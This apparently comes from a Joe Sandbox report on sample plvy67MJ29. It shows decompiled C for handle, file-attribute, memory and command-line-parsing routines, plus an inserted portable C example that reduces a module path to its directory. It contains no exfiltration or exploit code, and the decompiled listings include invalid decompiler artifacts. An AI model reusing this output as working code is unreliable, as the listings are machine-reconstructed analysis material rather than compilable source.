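        print(r.name, r.quality, all_apis(r), string_args(r))
    print(subcall_index(recs))
```

Run against a full saved report, the subcall index tells you which wrapper addresses (here 00FD44B9, the LoadStringA/MessageBoxA error box) are shared by many callers, and string_args gives the literals to search for in the sample and in memory dumps.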

C-Code - Quality: 100%
			E00FD4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18; // _a4 indexes a table of 0x18-byte entries based at 0xfd8d60
				if( *((intOrPtr*)(_t15 + 0xfd8d64)) != 1) {
					// executed; closes the handle stored at entry offset 0x14. FindCloseChangeNotification and
					// CloseHandle commonly resolve to the same kernelbase address, so this is most likely a plain CloseHandle.
					_t9 = FindCloseChangeNotification( *(_t15 + 0xfd8d74));
					if(_t9 == 0) {
						return _t9 | 0xffffffff; // -1 on failure
					}
					 *((intOrPtr*)(_t15 + 0xfd8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xfd8d60)) = 1; // entry flagged, remaining fields reset
				 *((intOrPtr*)(_t15 + 0xfd8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xfd8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xfd8d6c)) = 0;
				return 0;
			}

Instruction addresses (side-by-side view column): 0x00fd4b66, 0x00fd4b74, 0x00fd4b98, 0x00fd4ba0, 0x00000000, 0x00fd4bac, 0x00fd4ba4, 0x00000000, 0x00fd4ba4, 0x00fd4b78, 0x00fd4b7e, 0x00fd4b84, 0x00fd4b8a, 0x00000000

APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00FD4FA1,00000000), ref: 00FD4B98
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: bd2901d8c2c8ba7d6112bce05c1522d6b7aad3536582c7e28237d12751a8e9fd
• Instruction ID: 286b37e4a328d4b00b8a1a1fb3fce53d7dc4845af97561524892b01ca0020085
• Opcode Fuzzy Hash: bd2901d8c2c8ba7d6112bce05c1522d6b7aad3536582c7e28237d12751a8e9fd
• Instruction Fuzzy Hash: B0F0FE31900B0C9F47619F3A8C02652BBE7AAE53A0314092F946ED22D0DB70A542FBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00FD66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) { // INVALID_FILE_ATTRIBUTES: path missing or inaccessible
					return  !(_t1 >> 4) & 0x00000001; // bit 4 is FILE_ATTRIBUTE_DIRECTORY (0x10): 1 for an existing non-directory path
				} else {
					return 0;
				}
			}

Instruction addresses (side-by-side view column): 0x00fd66b1, 0x00fd66ba, 0x00fd66c7, 0x00fd66bc, 0x00fd66be, 0x00fd66be

APIs
• GetFileAttributesA.KERNELBASE(?,00FD4777,?,00FD4E38,?), ref: 00FD66B1
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 6c044c15ef0d11cb4e591c514b88cb848a3d3f66bb5144552d9fb5427b97f881
• Instruction ID: 62ae4be020c8ee81a70e7754fe00e0a2da466df65bafa9ecabc44157d51d5334
• Opcode Fuzzy Hash: 6c044c15ef0d11cb4e591c514b88cb848a3d3f66bb5144552d9fb5427b97f881
• Instruction Fuzzy Hash: 1CB09276622444426A2006356C295563942A6C123A7E85B92F032C02E0CA3EC846E008
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00FD4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




0x00fd4caa
0x00fd4cb1

APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00FD4CAA
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 8decd29ce61d56b4417c8e71e3c7b4ab1c170fa473271938d225911037c5b882
• Instruction ID: 4f79fc54e229b3ebffc8fe707e800312546b5d99242e75a4d10f4de929bdd8f6
• Opcode Fuzzy Hash: 8decd29ce61d56b4417c8e71e3c7b4ab1c170fa473271938d225911037c5b882
• Instruction Fuzzy Hash: E5B0123204420CB7CF002FE2EC0DF853F1EEBC4761F144041F60C45050CA729410969A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00FD4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




0x00fd4cc8
0x00fd4ccf

APIs
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: fe5a991756ffdf542858ccdb34240c31bc07e2da446fb991a810af5d278fff5d
• Instruction ID: aa4b9dab4cf5ff8e53421c9349b0796fffaac6a66f65c193bec88f8dfb821aae
• Opcode Fuzzy Hash: fe5a991756ffdf542858ccdb34240c31bc07e2da446fb991a810af5d278fff5d
• Instruction Fuzzy Hash: 7EB0123100010CB78F002B62EC0C8453F1ED6C42607000051F50C41021CB3398119589
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E00FD5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xfd8004; // 0x42de454f
				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				_t209 = 1;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					while(_t209 != 0) {
                                                                                                                                                                                                    						_t67 =  *_t173;
                                                                                                                                                                                                    						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                    							_t173 = CharNextA(_t173);
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v272 = _t173;
                                                                                                                                                                                                    						if(_t67 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t69 = _v272;
                                                                                                                                                                                                    							_t177 = 0;
                                                                                                                                                                                                    							_t213 = 0;
                                                                                                                                                                                                    							_t163 = 0;
                                                                                                                                                                                                    							_t202 = 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								if(_t213 != 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L21;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t69 =  *_t69;
                                                                                                                                                                                                    									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t69 = _v272;
                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                    										_t155 =  *_t69;
                                                                                                                                                                                                    										if(_t155 != 0x22) {
                                                                                                                                                                                                    											if(_t202 >= 0x104) {
                                                                                                                                                                                                    												goto L106;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                    												_t177 = _t177 + 1;
                                                                                                                                                                                                    												_t202 = _t202 + 1;
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                    													return E00FD6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                    								E00FD6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                    								_t71 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                    									_t75 = E00FD597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00FD44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                    									 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return E00FD6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                    												E00FD44B9(0, 0x521, 0xfd1140, 0, 0x40, 0);
                                                                                                                                                                                                    												_t85 =  *0xfd8588; // 0x0
                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
			goto L49;
		} else {
			_t167 = (0 | _v265 == 0x00000022) + 3;
			_t215 =  &_v268 + _t167;
			_t183 =  &_v268 + _t167;
			_t50 = _t183 + 1; // 0x1
			_t202 = _t50;
			do {
				_t88 =  *_t183;
				_t183 = _t183 + 1;
			} while (_t88 != 0);
			if(_t183 == _t202) {
				goto L49;
			} else {
				_t205 = 0x5b;
				if(E00FD667F(_t215, _t205) == 0) {
					L115:
					_t206 = 0x5d;
					if(E00FD667F(_t215, _t206) == 0) {
						L117:
						_t202 =  &_v276;
						_v276 = _t167;
						if(E00FD5C17(_t215,  &_v276) == 0) {
							goto L49;
						} else {
							_t202 = 0x104;
							E00FD1680(0xfd8c42, 0x104, _v276 + _t167 +  &_v268);
						}
					} else {
						_t202 = 0x5b;
						if(E00FD667F(_t215, _t202) == 0) {
							goto L49;
						} else {
							goto L117;
						}
					}
				} else {
					_t202 = 0x5d;
					if(E00FD667F(_t215, _t202) == 0) {
						goto L49;
					} else {
						goto L115;
					}
				}
			}
		}
	} else {
		 *0xfd8a24 = 1;
	}
	goto L50;
} else {
	_t100 = _t87 - 1;
	if(_t100 == 0) {
		L98:
		if(_v266 != 0x3a) {
			goto L49;
		} else {
			_t170 = (0 | _v265 == 0x00000022) + 3;
			_t217 =  &_v268 + _t170;
			_t192 =  &_v268 + _t170;
			_t38 = _t192 + 1; // 0x1
			_t202 = _t38;
			do {
				_t101 =  *_t192;
				_t192 = _t192 + 1;
			} while (_t101 != 0);
			if(_t192 == _t202) {
				goto L49;
			} else {
				_t202 =  &_v276;
				_v276 = _t170;
				if(E00FD5C17(_t217,  &_v276) == 0) {
					goto L49;
				} else {
					_t104 = CharUpperA(_v267);
					_t218 = 0xfd8b3e;
					_t105 = _v276;
					if(_t104 != 0x54) {
						_t218 = 0xfd8a3a;
					}
					E00FD1680(_t218, 0x104, _t105 + _t170 +  &_v268);
					_t202 = 0x104;
					E00FD658A(_t218, 0x104, 0xfd1140);
					if(E00FD31E0(_t218) != 0) {
						goto L50;
					} else {
						goto L106;
					}
				}
			}
		}
	} else {
		_t111 = _t100 - 0xa;
		if(_t111 == 0) {
			if(_v266 != 0) {
				if(_v266 != 0x3a) {
					goto L49;
				} else {
					_t199 = _v265;
					if(_t199 != 0) {
						_t219 =  &_v265;
						do {
							_t219 = _t219 + 1;
							_t115 = CharUpperA(_t199) - 0x45;
							if(_t115 == 0) {
								 *0xfd8a2c = 1;
							} else {
								_t200 = 2;
								_t119 = _t115 - _t200;
								if(_t119 == 0) {
									 *0xfd8a30 = 1;
								} else {
									if(_t119 == 0xf) {
										 *0xfd8a34 = 1;
									} else {
										_t209 = 0;
									}
								}
							}
							_t118 =  *_t219;
							_t199 = _t118;
						} while (_t118 != 0);
					}
				}
			} else {
				 *0xfd8a2c = 1;
			}
			goto L50;
		} else {
			_t127 = _t111 - 3;
			if(_t127 == 0) {
				if(_v266 != 0) {
					if(_v266 != 0x3a) {
						goto L49;
					} else {
						_t129 = CharUpperA(_v265);
						if(_t129 == 0x31) {
							goto L76;
						} else {
							if(_t129 == 0x41) {
								goto L83;
							} else {
								if(_t129 == 0x55) {
									goto L76;
								} else {
									goto L49;
								}
							}
						}
					}
				} else {
					L76:
					_push(2);
					_pop(1);
					L83:
					 *0xfd8a38 = 1;
				}
				goto L50;
			} else {
				_t132 = _t127 - 1;
				if(_t132 == 0) {
                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t201 = _v265;
                                                                                                                                                                                                    																		 *0xfd9a2c = 1;
                                                                                                                                                                                                    																		if(_t201 != 0) {
                                                                                                                                                                                                    																			_t220 =  &_v265;
                                                                                                                                                                                                    																			do {
                                                                                                                                                                                                    																				_t220 = _t220 + 1;
                                                                                                                                                                                                    																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                    																				if(_t142 == 0) {
                                                                                                                                                                                                    																					_t143 = 2;
                                                                                                                                                                                                    																					 *0xfd9a2c =  *0xfd9a2c | _t143;
                                                                                                                                                                                                    																					goto L70;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t145 = _t142 - 3;
                                                                                                                                                                                                    																					if(_t145 == 0) {
                                                                                                                                                                                                    																						 *0xfd8d48 =  *0xfd8d48 | 0x00000040;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t146 = _t145 - 5;
                                                                                                                                                                                                    																						if(_t146 == 0) {
                                                                                                                                                                                                    																							 *0xfd9a2c =  *0xfd9a2c & 0xfffffffd;
                                                                                                                                                                                                    																							goto L70;
                                                                                                                                                                                                    																						} else {
                                                                                                                                                                                                    																							_t147 = _t146 - 5;
                                                                                                                                                                                                    																							if(_t147 == 0) {
                                                                                                                                                                                                    																								 *0xfd9a2c =  *0xfd9a2c & 0xfffffffe;
                                                                                                                                                                                                    																								goto L70;
                                                                                                                                                                                                    																							} else {
                                                                                                                                                                                                    																								_t149 = _t147;
                                                                                                                                                                                                    																								if(_t149 == 0) {
                                                                                                                                                                                                    																									 *0xfd8d48 =  *0xfd8d48 | 0x00000080;
                                                                                                                                                                                                    																								} else {
                                                                                                                                                                                                    																									if(_t149 == 3) {
                                                                                                                                                                                                    																										 *0xfd9a2c =  *0xfd9a2c | 0x00000004;
                                                                                                                                                                                                    																										L70:
                                                                                                                                                                                                    																										 *0xfd8a28 = 1;
                                                                                                                                                                                                    																									} else {
                                                                                                                                                                                                    																										_t209 = 0;
                                                                                                                                                                                                    																									}
                                                                                                                                                                                                    																								}
                                                                                                                                                                                                    																							}
                                                                                                                                                                                                    																						}
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	 *0xfd9a2c = 3;
                                                                                                                                                                                                    																	 *0xfd8a28 = 1;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *0xfd8a2c != 0 &&  *0xfd8b3e == 0) {
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0xfd9a3c, 0xfd8b3e, 0x104) == 0) {
                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                    							 *((char*)(E00FD66C8(0xfd8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                    			}
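The tail of the listing above (the block guarded by *0xfd8a2c) calls GetModuleFileNameA into a 0x104-byte (MAX_PATH) buffer, asks the helper E00FD66C8 for the position of byte 0x5c (a backslash) and writes a zero one past it, which reduces the module's full path to its directory. The code below is an added example written for this page, not code from the sample or from Joe Sandbox: it reproduces that truncation in portable C so the edge cases can be exercised offline. The Win32 call is replaced by a constructed path string, the function names module_directory and strip_to_directory and the status codes are this example's own assumptions, and, unlike the decompiled code, it does not write through the search result when no backslash is present and it rejects a path whose length reaches the buffer size, which is how GetModuleFileNameA reports that the path did not fit.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not code from the sample or from Joe Sandbox): a portable
 * re-implementation of the "module path -> module directory" idiom seen in
 * the decompiled tail above, with the checks the decompiled code omits.
 *
 * Status codes (this example's own convention, reported by
 * module_directory_error()):
 *    0  path reduced to its directory, trailing backslash kept
 *   -1  empty path, or path length >= buffer size (what a truncated
 *       GetModuleFileNameA result looks like, since it returns nSize then)
 *   -2  no backslash in the path; buffer left untouched
 */
#define MODDIR_MAX_PATH 0x104   /* same size the sample passes to GetModuleFileNameA */

static char g_dir[MODDIR_MAX_PATH];
static int  g_last_error;

/* Truncate a NUL-terminated path in place, one byte past its last backslash. */
static int strip_to_directory(char *path)
{
    /* The decompiled code does *(helper(buf, '\\') + 1) = 0 unconditionally.
     * If the helper returns NULL when there is no backslash, that is a write
     * to address 1, so check the result before using it. */
    char *sep = strrchr(path, '\\');
    if (sep == NULL)
        return -2;
    sep[1] = '\0';              /* keep the backslash, drop the file name */
    return 0;
}

/* `full` plays the role of the string GetModuleFileNameA would write and
 * `cap` the buffer size handed to it (clamped to this example's buffer).
 * Returns the directory in a static buffer, or NULL on failure. */
const char *module_directory(const char *full, size_t cap)
{
    size_t n = strlen(full);
    if (cap > sizeof g_dir)
        cap = sizeof g_dir;
    /* A result of 0 is an API failure; a result equal to the buffer size
     * means the path was cut off, and searching a cut-off path for its last
     * backslash would yield a wrong or missing directory. Refuse both. */
    if (n == 0 || n >= cap) {
        g_last_error = -1;
        return NULL;
    }
    memcpy(g_dir, full, n + 1);
    g_last_error = strip_to_directory(g_dir);
    return g_last_error == 0 ? g_dir : NULL;
}

int module_directory_error(void)
{
    return g_last_error;
}

int main(void)
{
    /* Constructed sample path; a real caller would obtain it from
     * GetModuleFileNameA(NULL, buf, MODDIR_MAX_PATH). */
    const char *dir = module_directory("C:\\Users\\user\\Desktop\\file.exe", MODDIR_MAX_PATH);
    printf("directory: %s\n", dir ? dir : "(error)");
    dir = module_directory("file.exe", MODDIR_MAX_PATH);
    printf("no separator -> %s, status %d\n", dir ? dir : "NULL", module_directory_error());
    return 0;
}
```

For the sample path the function returns "C:\Users\user\Desktop\"; a bare file name yields NULL with status -2 instead of the out-of-bounds write the decompiled code would attempt, and a path that fills the buffer yields NULL with status -1.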
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d93
                                                                                                                                                                                                    0x00fd5d93
                                                                                                                                                                                                    0x00fd5d9a
                                                                                                                                                                                                    0x00fd5d9d
                                                                                                                                                                                                    0x00fd5d9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d9e
                                                                                                                                                                                                    0x00fd5d51
                                                                                                                                                                                                    0x00fd5d5b
                                                                                                                                                                                                    0x00fd5d72
                                                                                                                                                                                                    0x00fd60fb
                                                                                                                                                                                                    0x00fd60fb
                                                                                                                                                                                                    0x00fd6207
                                                                                                                                                                                                    0x00fd620a
                                                                                                                                                                                                    0x00fd620b
                                                                                                                                                                                                    0x00fd620e
                                                                                                                                                                                                    0x00fd6217
                                                                                                                                                                                                    0x00fd5d78
                                                                                                                                                                                                    0x00fd5d78
                                                                                                                                                                                                    0x00fd5d80
                                                                                                                                                                                                    0x00fd5d83
                                                                                                                                                                                                    0x00fd5d84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d84
                                                                                                                                                                                                    0x00fd5d5d
                                                                                                                                                                                                    0x00fd5d5f
                                                                                                                                                                                                    0x00fd5d62
                                                                                                                                                                                                    0x00fd5d68
                                                                                                                                                                                                    0x00fd5d64
                                                                                                                                                                                                    0x00fd5d64
                                                                                                                                                                                                    0x00fd5d64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d62
                                                                                                                                                                                                    0x00fd5d5b
                                                                                                                                                                                                    0x00fd5d4f
                                                                                                                                                                                                    0x00fd5d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d9f
                                                                                                                                                                                                    0x00fd5d9f
                                                                                                                                                                                                    0x00fd5da5
                                                                                                                                                                                                    0x00fd5dab
                                                                                                                                                                                                    0x00fd5dba
                                                                                                                                                                                                    0x00fd6218
                                                                                                                                                                                                    0x00fd621d
                                                                                                                                                                                                    0x00fd6220
                                                                                                                                                                                                    0x00fd6221
                                                                                                                                                                                                    0x00fd6229
                                                                                                                                                                                                    0x00fd6230
                                                                                                                                                                                                    0x00fd6247
                                                                                                                                                                                                    0x00fd626a
                                                                                                                                                                                                    0x00fd6272
                                                                                                                                                                                                    0x00fd6249
                                                                                                                                                                                                    0x00fd6255
                                                                                                                                                                                                    0x00fd625f
                                                                                                                                                                                                    0x00fd6264
                                                                                                                                                                                                    0x00fd6264
                                                                                                                                                                                                    0x00fd6284
                                                                                                                                                                                                    0x00fd5dc0
                                                                                                                                                                                                    0x00fd5dc0
                                                                                                                                                                                                    0x00fd5dca
                                                                                                                                                                                                    0x00fd5e22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5dcc
                                                                                                                                                                                                    0x00fd5dce
                                                                                                                                                                                                    0x00fd5e24
                                                                                                                                                                                                    0x00fd5e24
                                                                                                                                                                                                    0x00fd5e2c
                                                                                                                                                                                                    0x00fd5e47
                                                                                                                                                                                                    0x00fd5e4a
                                                                                                                                                                                                    0x00fd61d2
                                                                                                                                                                                                    0x00fd61e2
                                                                                                                                                                                                    0x00fd61e7
                                                                                                                                                                                                    0x00fd61ee
                                                                                                                                                                                                    0x00fd61f1
                                                                                                                                                                                                    0x00fd61f1
